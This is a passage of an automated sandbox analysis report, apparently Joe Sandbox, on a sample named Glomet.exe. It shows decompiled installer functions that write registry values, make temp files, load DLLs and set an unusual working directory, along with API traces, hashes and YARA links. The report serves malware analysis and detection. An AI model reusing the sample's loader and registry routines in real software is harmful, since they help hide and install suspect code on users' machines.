                                                                                                                                                                              • Opcode ID: d3065a1495d08a70ee0ec73ce03137b35b959529f7d494a5279a47c727d8abac
                                                                                                                                                                              • Instruction ID: d48e4a71bfa48a15fd7248f9ae3dc224302ba9e6f67c9eaa91d5645e55e2e307
                                                                                                                                                                              • Opcode Fuzzy Hash: d3065a1495d08a70ee0ec73ce03137b35b959529f7d494a5279a47c727d8abac
                                                                                                                                                                              • Instruction Fuzzy Hash: D9213771500108BADF129F90CE89EEB7B7DEF44344F10047AFA15B11A0D7B49EA4AAA8
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 0040247E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 750 40247e-4024af call 402c39 * 2 call 402cc9 757 402ac5-402ad4 750->757 758 4024b5-4024bf 750->758 760 4024c1-4024ce call 402c39 lstrlenA 758->760 761 4024cf-4024d2 758->761 760->761 762 4024d4-4024e8 call 402c17 761->762 763 4024e9-4024ec 761->763 762->763 768 4024fd-402511 RegSetValueExA 763->768 769 4024ee-4024f8 call 403143 763->769 772 402513 768->772 773 402516-4025f3 RegCloseKey 768->773 769->768 772->773 773->757
                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                              			E0040247E(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t18;
				void* _t19;
				int _t22;
				long _t23;
				int _t28;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t35;
				void* _t37;
				void* _t40;

				_t31 = __edx;
				_t28 = __ebx;
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				_t32 = __eax;
				 *(_t37 - 0x38) =  *(_t37 - 0x14);
				 *(_t37 - 0x78) = E00402C39(2);
				_t18 = E00402C39(0x11);
				 *(_t37 - 4) = 1;
				_t19 = E00402CC9(_t40, _t32, _t18, 2); // executed
				 *(_t37 + 8) = _t19;
				if(_t19 != __ebx) {
					_t22 = 0;
					if(_t35 == 1) {
						E00402C39(0x23);
						_t22 = lstrlenA(0x40ac38) + 1;
					}
					if(_t35 == 4) {
						 *0x40ac38 = E00402C17(3);
						 *((intOrPtr*)(_t37 - 0x88)) = _t31;
						_t22 = _t35;
					}
					if(_t35 == 3) {
						_t22 = E00403143( *((intOrPtr*)(_t37 - 0x1c)), _t28, 0x40ac38, 0xc00);
					}
					_t23 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x78), _t28,  *(_t37 - 0x38), 0x40ac38, _t22); // executed
					if(_t23 == 0) {
						 *(_t37 - 4) = _t28;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *(_t37 - 4);
				return 0;
			}













                                                                                                                                                                              0x0040247e
                                                                                                                                                                              0x0040247e
                                                                                                                                                                              0x0040247e
                                                                                                                                                                              0x00402481
                                                                                                                                                                              0x00402488
                                                                                                                                                                              0x00402492
                                                                                                                                                                              0x00402495
                                                                                                                                                                              0x0040249e
                                                                                                                                                                              0x004024a5
                                                                                                                                                                              0x004024ac
                                                                                                                                                                              0x004024af
                                                                                                                                                                              0x004024b5
                                                                                                                                                                              0x004024bf
                                                                                                                                                                              0x004024c3
                                                                                                                                                                              0x004024ce
                                                                                                                                                                              0x004024ce
                                                                                                                                                                              0x004024d2
                                                                                                                                                                              0x004024dc
                                                                                                                                                                              0x004024e2
                                                                                                                                                                              0x004024e8
                                                                                                                                                                              0x004024e8
                                                                                                                                                                              0x004024ec
                                                                                                                                                                              0x004024f8
                                                                                                                                                                              0x004024f8
                                                                                                                                                                              0x00402509
                                                                                                                                                                              0x00402511
                                                                                                                                                                              0x00402513
                                                                                                                                                                              0x00402513
                                                                                                                                                                              0x00402516
                                                                                                                                                                              0x004025ed
                                                                                                                                                                              0x004025ed
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb11EA.tmp,00000023,00000011,00000002), ref: 004024C9
                                                                                                                                                                              • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsb11EA.tmp,00000000,00000011,00000002), ref: 00402509
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsb11EA.tmp,00000000,00000011,00000002), ref: 004025ED
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseValuelstrlen
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp
                                                                                                                                                                              • API String ID: 2655323295-3428060773
                                                                                                                                                                              • Opcode ID: e7bab2dcec296759a74a33424807f7fed87e27b7007b4ae7814fd3a0996a0b2c
                                                                                                                                                                              • Instruction ID: f3aadfd2260b8f93e823aa7e7f88ba76dab9d069632aeea64c5940af2cf5b862
                                                                                                                                                                              • Opcode Fuzzy Hash: e7bab2dcec296759a74a33424807f7fed87e27b7007b4ae7814fd3a0996a0b2c
                                                                                                                                                                              • Instruction Fuzzy Hash: 5E119371E04208BFEB20AFA59E49AAE7A74EB44714F21443FF504F71C1D6B94D409B68
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00405E19 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 775 405e19-405e23 776 405e24-405e4f GetTickCount GetTempFileNameA 775->776 777 405e51-405e53 776->777 778 405e5e-405e60 776->778 777->776 779 405e55 777->779 780 405e58-405e5b 778->780 779->780
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405E19(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3d4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                                                                                                                                              0x00405e1d
                                                                                                                                                                              0x00405e23
                                                                                                                                                                              0x00405e24
                                                                                                                                                                              0x00405e24
                                                                                                                                                                              0x00405e29
                                                                                                                                                                              0x00405e2a
                                                                                                                                                                              0x00405e2d
                                                                                                                                                                              0x00405e37
                                                                                                                                                                              0x00405e44
                                                                                                                                                                              0x00405e47
                                                                                                                                                                              0x00405e4f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405e53
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405e55
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405e55
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405E2D
                                                                                                                                                                              • GetTempFileNameA.KERNELBASE(0000000B,?,00000000,?,?,004033B1,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007), ref: 00405E47
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                              • API String ID: 1716503409-1968954121
                                                                                                                                                                              • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                                                                                                                              • Instruction ID: db84433a099d66a6ad53f3418d19e52f8fbd3804b66164b4918815a523437c08
                                                                                                                                                                              • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                                                                                                                              • Instruction Fuzzy Hash: 9CF0A736348208BBEB109F56ED04B9B7B9CDF91B50F10C03BFA84DB180D6B5DA548798
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 004020A5 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                                              			E004020A5(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f4e0");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4a8 =  *0x42f4a8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402C39(0xfffffff0);
				 *(_t34 + 8) = E00402C39(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00405378(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b878, 0x40a000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004039DD(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                                                                                              0x004020a5
                                                                                                                                                                              0x004020a5
                                                                                                                                                                              0x004020aa
                                                                                                                                                                              0x004020b1
                                                                                                                                                                              0x0040216c
                                                                                                                                                                              0x004022e5
                                                                                                                                                                              0x004022e5
                                                                                                                                                                              0x00402ac5
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4
                                                                                                                                                                              0x00402ad4
                                                                                                                                                                              0x004020c0
                                                                                                                                                                              0x004020ca
                                                                                                                                                                              0x004020cd
                                                                                                                                                                              0x004020dc
                                                                                                                                                                              0x004020e0
                                                                                                                                                                              0x004020e6
                                                                                                                                                                              0x004020ea
                                                                                                                                                                              0x00402165
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00402165
                                                                                                                                                                              0x004020ec
                                                                                                                                                                              0x004020f5
                                                                                                                                                                              0x004020f9
                                                                                                                                                                              0x0040213d
                                                                                                                                                                              0x004020fb
                                                                                                                                                                              0x004020fe
                                                                                                                                                                              0x00402101
                                                                                                                                                                              0x00402131
                                                                                                                                                                              0x00402103
                                                                                                                                                                              0x00402106
                                                                                                                                                                              0x0040210f
                                                                                                                                                                              0x00402111
                                                                                                                                                                              0x00402111
                                                                                                                                                                              0x0040210f
                                                                                                                                                                              0x00402101
                                                                                                                                                                              0x00402145
                                                                                                                                                                              0x0040215a
                                                                                                                                                                              0x0040215a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00402145
                                                                                                                                                                              0x004020d0
                                                                                                                                                                              0x004020d6
                                                                                                                                                                              0x004020da
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020D0
                                                                                                                                                                                • Part of subcall function 00405378: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                                                                                                                                                • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                                                                                                                                                • Part of subcall function 00405378: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,0040329E,0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,00000000,00422E48,7620EA30), ref: 004053D4
                                                                                                                                                                                • Part of subcall function 00405378: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll), ref: 004053E6
                                                                                                                                                                                • Part of subcall function 00405378: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540C
                                                                                                                                                                                • Part of subcall function 00405378: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405426
                                                                                                                                                                                • Part of subcall function 00405378: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405434
                                                                                                                                                                              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020E0
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004020F0
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040215A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2987980305-0
                                                                                                                                                                              • Opcode ID: c2b3ecd03a149f651ebeb28022e50585e6a1415636be2ecdb2c0b4a3a556a140
                                                                                                                                                                              • Instruction ID: 3c6328a696446079fc2d308fbd04895e9a1cd4fdde8666fe7d5c2d170abc5611
                                                                                                                                                                              • Opcode Fuzzy Hash: c2b3ecd03a149f651ebeb28022e50585e6a1415636be2ecdb2c0b4a3a556a140
                                                                                                                                                                              • Instruction Fuzzy Hash: 7721F631904215E7CF207FA58F4DAAF3670AF54358F60423BF601B61E0DAFD49819A6E
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                              			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402C39(0xfffffff0);
				_t13 = E00405C82(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405C14(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004058BB(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D8(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E0040583E(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406257("C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens\\Lektionskatalogets1", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                                                                                                                              0x004015bb
                                                                                                                                                                              0x004015c2
                                                                                                                                                                              0x004015c5
                                                                                                                                                                              0x004015ca
                                                                                                                                                                              0x004015ce
                                                                                                                                                                              0x004015d0
                                                                                                                                                                              0x004015d8
                                                                                                                                                                              0x004015da
                                                                                                                                                                              0x004015dc
                                                                                                                                                                              0x004015e0
                                                                                                                                                                              0x004015e3
                                                                                                                                                                              0x004015fb
                                                                                                                                                                              0x004015fc
                                                                                                                                                                              0x004015e5
                                                                                                                                                                              0x004015e5
                                                                                                                                                                              0x004015e8
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004015f3
                                                                                                                                                                              0x004015f4
                                                                                                                                                                              0x004015f4
                                                                                                                                                                              0x004015e8
                                                                                                                                                                              0x00401603
                                                                                                                                                                              0x0040160a
                                                                                                                                                                              0x00401617
                                                                                                                                                                              0x00401617
                                                                                                                                                                              0x0040160c
                                                                                                                                                                              0x0040160d
                                                                                                                                                                              0x00401615
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00401615
                                                                                                                                                                              0x0040160a
                                                                                                                                                                              0x0040161a
                                                                                                                                                                              0x0040161d
                                                                                                                                                                              0x0040161f
                                                                                                                                                                              0x00401620
                                                                                                                                                                              0x004015d0
                                                                                                                                                                              0x00401627
                                                                                                                                                                              0x00401652
                                                                                                                                                                              0x004022e5
                                                                                                                                                                              0x00401629
                                                                                                                                                                              0x0040162b
                                                                                                                                                                              0x00401636
                                                                                                                                                                              0x0040163c
                                                                                                                                                                              0x00401644
                                                                                                                                                                              0x0040164a
                                                                                                                                                                              0x0040164a
                                                                                                                                                                              0x00401644
                                                                                                                                                                              0x00402ac8
                                                                                                                                                                              0x00402ad4

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00405C82: CharNextA.USER32(?,?,0042BC98,0000000B,00405CEE,0042BC98,0042BC98,7620FA90,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ), ref: 00405C90
                                                                                                                                                                                • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                                                                                                                                                • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                                                                                                • Part of subcall function 0040583E: CreateDirectoryA.KERNELBASE(?,0000000B,C:\Users\user\AppData\Local\Temp\), ref: 00405881
                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1,00000000,00000000,000000F0), ref: 0040163C
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1, xrefs: 00401631
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                              • String ID: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1
                                                                                                                                                                              • API String ID: 1892508949-3951930202
                                                                                                                                                                              • Opcode ID: 1d08fccf013ae01466d21f2db869ba298c67a8c3c420c2a747c013d99e6cef01
                                                                                                                                                                              • Instruction ID: 7a2b8dfd757742e83ffe6dd7df5b12a9f5db33ee71018b299411addc72821366
                                                                                                                                                                              • Opcode Fuzzy Hash: 1d08fccf013ae01466d21f2db869ba298c67a8c3c420c2a747c013d99e6cef01
                                                                                                                                                                              • Instruction Fuzzy Hash: 54110431508141EBDF307BA54D409BF27B49A96324B68453FF9D1B22E2DA3D4942AA3E
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 0040613E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                                              			E0040613E(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060DD(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20); // executed
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                                                                                                              0x0040614c
                                                                                                                                                                              0x0040614e
                                                                                                                                                                              0x00406166
                                                                                                                                                                              0x0040616b
                                                                                                                                                                              0x00406170
                                                                                                                                                                              0x004061ad
                                                                                                                                                                              0x004061ad
                                                                                                                                                                              0x00406172
                                                                                                                                                                              0x00406184
                                                                                                                                                                              0x0040618f
                                                                                                                                                                              0x00406195
                                                                                                                                                                              0x0040619f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040619f
                                                                                                                                                                              0x004061b2

                                                                                                                                                                              APIs
                                                                                                                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,ExecToStack,?,?,?,?,00000002,ExecToStack,?,004063F6,80000002), ref: 00406184
                                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,004063F6,80000002,Software\Microsoft\Windows\CurrentVersion,ExecToStack,ExecToStack,ExecToStack,?,Skipped: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll), ref: 0040618F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                                                              • String ID: ExecToStack
